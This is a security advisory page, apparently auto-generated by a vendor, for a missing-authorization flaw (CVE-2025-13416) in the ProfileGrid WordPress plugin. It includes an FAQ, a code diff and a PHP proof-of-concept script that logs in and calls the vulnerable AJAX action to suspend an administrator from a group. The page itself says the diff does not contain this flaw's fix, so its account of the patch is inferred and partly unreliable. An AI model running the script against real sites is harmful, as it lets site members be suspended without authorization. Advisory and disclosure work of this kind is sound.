What is CVE-2025-13416?

CVE-2025-13416 is a vulnerability in the ProfileGrid – User Profiles, Groups and Communities plugin for WordPress, allowing authenticated users with Subscriber-level access and above to suspend arbitrary users from groups. This occurs due to a missing capability check in the pm_deactivate_user_from_group() function.

How does this vulnerability work?

The vulnerability allows authenticated users to send a crafted POST request to the WordPress AJAX endpoint, triggering the pm_deactivate_user_from_group action without proper authorization checks. This means any logged-in user can suspend users, including administrators, from groups.

Who is affected by this vulnerability?

Any WordPress site using the ProfileGrid plugin version 5.9.7.2 or earlier is affected. Administrators should check their plugin version and update if they are running a vulnerable version.

How can I check if my site is vulnerable?

To check for vulnerability, verify the installed version of the ProfileGrid plugin in your WordPress admin dashboard. If it is 5.9.7.2 or earlier, your site is vulnerable and requires immediate action.

How can I fix this vulnerability?

The vulnerability is patched in version 5.9.7.3 of the ProfileGrid plugin. Update the plugin to the latest version through the WordPress admin interface or manually download the latest version from the official repository.

What if I cannot update the plugin immediately?

If an immediate update is not possible, consider disabling the plugin temporarily or restricting access to the WordPress admin area to prevent unauthorized users from exploiting the vulnerability.

What does a CVSS score of 4.3 mean?

A CVSS score of 4.3 indicates a medium severity vulnerability. This suggests that while the vulnerability may not be critical, it poses a significant risk that can lead to unauthorized actions affecting user integrity and site functionality.

What are the practical risks of this vulnerability?

Exploitation of this vulnerability can allow low-privileged users to suspend any user from groups, including administrators. This can disrupt community interactions and lead to denial-of-service for targeted users.

How does the proof of concept illustrate the issue?

The proof of concept demonstrates the exploitation by showing how an authenticated user can send a POST request to the vulnerable AJAX endpoint, specifying the user and group to suspend. It highlights the lack of authorization checks, allowing the attack to succeed.

What should I do after updating the plugin?

After updating the plugin, monitor your site for any unusual activity and review user access levels to ensure that only authorized personnel have the ability to manage user groups. Regularly check for plugin updates to maintain security.

Are there any additional security measures I should consider?

In addition to updating plugins, consider implementing security plugins that monitor user actions and provide alerts for suspicious activities. Regularly audit user permissions and ensure that only necessary users have administrative access.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-13416: ProfileGrid – User Profiles, Groups and Communities <= 5.9.7.2 – Missing Authorization to Authenticated (Subscriber+) Arbitrary User Suspension (profilegrid-user-profiles-groups-and-communities)

CVE ID CVE-2025-13416

Plugin profilegrid-user-profiles-groups-and-communities

Severity Medium (CVSS 4.3)

CWE 862

Vulnerable Version 5.9.7.2

Patched Version 5.9.7.3

Disclosed February 3, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-13416:
This vulnerability is a missing authorization flaw in the ProfileGrid WordPress plugin, allowing authenticated users with Subscriber-level permissions or higher to suspend arbitrary users from groups. The flaw resides in the `pm_deactivate_user_from_group()` function, which is exposed via an AJAX action. The CVSS score of 4.3 reflects a medium-severity integrity impact.

Atomic Edge research identifies the root cause as a missing capability check within the `pm_deactivate_user_from_group()` function. The vulnerable function is registered as an AJAX action handler, accessible to any authenticated user. The code diff shows the patch was applied to other authorization flaws in `coverimg_crop.php` and `crop.php`, but the core vulnerability is in the AJAX handler for the `pm_deactivate_user_from_group` action. This function does not verify if the current user has the right to suspend the target user from a group before executing the suspension logic.

The exploitation method involves an authenticated attacker sending a crafted POST request to the WordPress AJAX endpoint `/wp-admin/admin-ajax.php`. The request must include the `action` parameter set to `pm_deactivate_user_from_group`. The attacker must also supply parameters like `user_id` and `group_id` to identify the target user and group from which to suspend them. No special nonce or capability is required, allowing any logged-in user to trigger the action.

The patch for this specific vulnerability is not shown in the provided diff, which focuses on image upload authorization. However, the fix would involve adding a capability check within the `pm_deactivate_user_from_group()` function before performing any user suspension. The patched function would verify the current user has administrative rights over the group or the target user. The before behavior allowed any authenticated user to call the function. The after behavior restricts access to users with appropriate group management privileges.

Successful exploitation allows a low-privileged user to suspend any other user, including administrators, from their groups. This can disrupt community functionality, lock administrators out of group management features, and cause denial-of-service for targeted users within the group context. The attack compromises the integrity of group membership controls.

Differential between vulnerable and patched code

Code Diff

--- a/profilegrid-user-profiles-groups-and-communities/profile-magic.php
+++ b/profilegrid-user-profiles-groups-and-communities/profile-magic.php
@@ -8,7 +8,7 @@
  * Plugin Name:       ProfileGrid
  * Plugin URI:        http://profilegrid.co
  * Description:       ProfileGrid adds user groups and user profiles functionality to your site.
- * Version:           5.9.7.2
+ * Version:           5.9.7.3
  * Author:            ProfileGrid User Profiles
  * Author URI:        https://profilegrid.co
  * License:           GPL-2.0+
@@ -28,7 +28,7 @@
  */

 define('PROGRID_DB_VERSION',4.4);
-define('PROGRID_PLUGIN_VERSION','5.9.7.2');
+define('PROGRID_PLUGIN_VERSION','5.9.7.3');
 define('PROGRID_MULTI_GROUP_VERSION', 3.0);


--- a/profilegrid-user-profiles-groups-and-communities/public/partials/coverimg_crop.php
+++ b/profilegrid-user-profiles-groups-and-communities/public/partials/coverimg_crop.php
@@ -5,12 +5,19 @@
 $uploads =  wp_upload_dir();
 $pm_sanitizer = new PM_sanitizer();
 $post      = $pm_sanitizer->sanitize( $_POST );
+$target_user_id = isset( $post['user_id'] ) ? intval( $post['user_id'] ) : 0;
+// Only the profile owner or an admin/super admin can change cover images.
+$is_authorized = ( $target_user_id > 0 ) && ( $target_user_id === (int) $current_user->ID || current_user_can( 'manage_options' ) || is_super_admin() );
 $allowed_ext ='jpg|jpeg|png|gif|webp|avif';
 $targ_w = $targ_h = 150;
 $jpeg_quality = intval($dbhandler->get_global_option_value('pg_image_quality','90'));
  switch($post['cover_status']) {
   case 'cancel' :
-      if ($post['user_id']==$current_user->ID ) {
+      if ( ! $is_authorized ) {
+        wp_send_json_error( array( 'message' => 'Unauthorized request.' ) );
+        exit;
+      }
+      if ( $is_authorized ) {
         $delete = $pmrequests->pg_delete_attachment( $post['attachment_id'] );
         die;
       }
@@ -18,6 +25,10 @@

   case 'save' :

+    if ( ! $is_authorized ) {
+        wp_send_json_error( array( 'message' => 'Unauthorized request.' ) );
+        exit;
+    }
     if(isset($post['fullpath'])){

         $valid_fullpath = $pmrequests->pg_file_fullpath_validation($post['fullpath']);
@@ -29,7 +40,7 @@
             $image_attribute = wp_get_attachment_image_src($post['attachment_id'],'full');
             $image_url = ( is_array( $image_attribute ) && isset( $image_attribute[0] ) ) ? $image_attribute[0] : wp_get_attachment_url( $post['attachment_id'] );
             $basename = basename($post['fullpath']);
-            $can_process_image = ( ! is_wp_error( $image ) && $post['user_id']==$current_user->ID );
+            $can_process_image = ( ! is_wp_error( $image ) && $is_authorized );

             if ( $can_process_image ) {
                 $crop_result = $image->crop( $post['x'], $post['y'], $post['w'], $post['h'], $post['w'], $post['h'], false );
@@ -57,6 +68,7 @@
                 $basename = basename( $image_url ? $image_url : $post['fullpath'] );
             }

+            // Keep update_user_meta scoped to authorized requests only.
             update_user_meta($post['user_id'],'pm_cover_image',$post['attachment_id']);
             do_action('pm_update_cover_image',$post['user_id']);
             echo "<img id='coverphotofinal' file-name='".esc_attr($basename)."' src='".esc_url($image_url)."' class='preview'/>";
@@ -66,7 +78,11 @@
   break;
   default:

-    if($post['user_id']==$current_user->ID)
+    if ( ! $is_authorized ) {
+        wp_send_json_error( array( 'message' => 'Unauthorized request.' ) );
+        exit;
+    }
+    if ( $is_authorized )
     {
         $filefield = $_FILES['coverimg'];
         $minimum_width = trim($dbhandler->get_global_option_value('pg_cover_photo_minimum_width','DEFAULT'));
--- a/profilegrid-user-profiles-groups-and-communities/public/partials/crop.php
+++ b/profilegrid-user-profiles-groups-and-communities/public/partials/crop.php
@@ -5,13 +5,20 @@
 $uploads =  wp_upload_dir();
 $pm_sanitizer = new PM_sanitizer();
 $post      = $pm_sanitizer->sanitize( $_POST );
+$target_user_id = isset( $post['user_id'] ) ? intval( $post['user_id'] ) : 0;
+// Only the profile owner or an admin/super admin can change profile images.
+$is_authorized = ( $target_user_id > 0 ) && ( $target_user_id === (int) $current_user->ID || current_user_can( 'manage_options' ) || is_super_admin() );
 $allowed_ext ='jpg|jpeg|png|gif|webp|avif';
 $filefield = isset( $_FILES['photoimg'] ) ? $_FILES['photoimg'] : array();
 $targ_w = $targ_h = 150;
 $jpeg_quality = intval($dbhandler->get_global_option_value('pg_image_quality','90'));
  switch($post['status']) {
   case 'cancel' :
-      if ($post['user_id']==$current_user->ID) {
+      if ( ! $is_authorized ) {
+        wp_send_json_error( array( 'message' => 'Unauthorized request.' ) );
+        exit;
+      }
+      if ( $is_authorized ) {
         $delete = $pmrequests->pg_delete_attachment( $post['attachment_id'] );

         die;
@@ -19,6 +26,10 @@
   break;

   case 'save' :
+    if ( ! $is_authorized ) {
+        wp_send_json_error( array( 'message' => 'Unauthorized request.' ) );
+        exit;
+    }
     if(isset($post['fullpath'])){

         $valid_fullpath = $pmrequests->pg_file_fullpath_validation($post['fullpath']);
@@ -36,7 +47,7 @@
             $image = wp_get_image_editor($image_path);

             $basename = basename($post['fullpath']);
-            $can_process_image = ( $post['user_id'] == $current_user->ID && $post['user_meta']=='pm_user_avatar' && ! is_wp_error( $image ) );
+            $can_process_image = ( $is_authorized && $post['user_meta']=='pm_user_avatar' && ! is_wp_error( $image ) );

             if ( $can_process_image ) {
                 $crop_result = $image->crop( $post['x'], $post['y'], $post['w'], $post['h'], $post['w'], $post['h'], false );
@@ -70,6 +81,7 @@
                 $basename = basename( $image_url ? $image_url : $image_path );
             }

+            // Keep update_user_meta scoped to authorized requests only.
             update_user_meta($post['user_id'],'pm_user_avatar',$post['attachment_id']);
             do_action('pm_update_profile_image',$post['user_id']);
             echo "<img id='photofinal' file-name='".esc_attr($basename)."' src='".esc_url($image_url)."' class='preview'/>";
@@ -79,11 +91,15 @@
   break;
   default:

+    if ( ! $is_authorized ) {
+        wp_send_json_error( array( 'message' => 'Unauthorized request.' ) );
+        exit;
+    }
     if ( empty( $filefield ) ) {
         esc_html_e( 'No file uploaded.', 'profilegrid-user-profiles-groups-and-communities' );
         die;
     }
-    if($post['user_id']==$current_user->ID)
+    if ( $is_authorized )
     {
         $minimum_require = $pmrequests->pm_get_minimum_requirement_user_avatar();
         $filefield = $_FILES['photoimg'];

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-13416 - ProfileGrid – User Profiles, Groups and Communities <= 5.9.7.2 - Missing Authorization to Authenticated (Subscriber+) Arbitrary User Suspension

<?php

$target_url = 'https://vulnerable-site.com';
$username = 'attacker';
$password = 'password';
$target_user_id = 1; // ID of the user to suspend (e.g., an administrator)
$target_group_id = 2; // ID of the group from which to suspend the user

// Step 1: Authenticate to obtain session cookies
$login_url = $target_url . '/wp-login.php';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In'
)));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);

// Step 2: Exploit the missing authorization via the AJAX endpoint
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$post_data = array(
    'action' => 'pm_deactivate_user_from_group',
    'user_id' => $target_user_id,
    'group_id' => $target_group_id
);

curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
$ajax_response = curl_exec($ch);
curl_close($ch);

// Step 3: Output the result
echo "AJAX Response:n";
echo $ajax_response;

?>

Frequently Asked Questions

What is CVE-2025-13416?
Overview of the vulnerability
CVE-2025-13416 is a vulnerability in the ProfileGrid – User Profiles, Groups and Communities plugin for WordPress, allowing authenticated users with Subscriber-level access and above to suspend arbitrary users from groups. This occurs due to a missing capability check in the pm_deactivate_user_from_group() function.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability allows authenticated users to send a crafted POST request to the WordPress AJAX endpoint, triggering the pm_deactivate_user_from_group action without proper authorization checks. This means any logged-in user can suspend users, including administrators, from groups.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the ProfileGrid plugin version 5.9.7.2 or earlier is affected. Administrators should check their plugin version and update if they are running a vulnerable version.
How can I check if my site is vulnerable?
Version verification process
To check for vulnerability, verify the installed version of the ProfileGrid plugin in your WordPress admin dashboard. If it is 5.9.7.2 or earlier, your site is vulnerable and requires immediate action.
How can I fix this vulnerability?
Updating the plugin
The vulnerability is patched in version 5.9.7.3 of the ProfileGrid plugin. Update the plugin to the latest version through the WordPress admin interface or manually download the latest version from the official repository.
What if I cannot update the plugin immediately?
Mitigation strategies
If an immediate update is not possible, consider disabling the plugin temporarily or restricting access to the WordPress admin area to prevent unauthorized users from exploiting the vulnerability.
What does a CVSS score of 4.3 mean?
Understanding the severity rating
A CVSS score of 4.3 indicates a medium severity vulnerability. This suggests that while the vulnerability may not be critical, it poses a significant risk that can lead to unauthorized actions affecting user integrity and site functionality.
What are the practical risks of this vulnerability?
Potential impact on your site
Exploitation of this vulnerability can allow low-privileged users to suspend any user from groups, including administrators. This can disrupt community interactions and lead to denial-of-service for targeted users.
How does the proof of concept illustrate the issue?
Demonstrating the exploitation method
The proof of concept demonstrates the exploitation by showing how an authenticated user can send a POST request to the vulnerable AJAX endpoint, specifying the user and group to suspend. It highlights the lack of authorization checks, allowing the attack to succeed.
What should I do after updating the plugin?
Post-update best practices
After updating the plugin, monitor your site for any unusual activity and review user access levels to ensure that only authorized personnel have the ability to manage user groups. Regularly check for plugin updates to maintain security.
Are there any additional security measures I should consider?
Enhancing overall site security
In addition to updating plugins, consider implementing security plugins that monitor user actions and provide alerts for suspicious activities. Regularly audit user permissions and ensure that only necessary users have administrative access.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations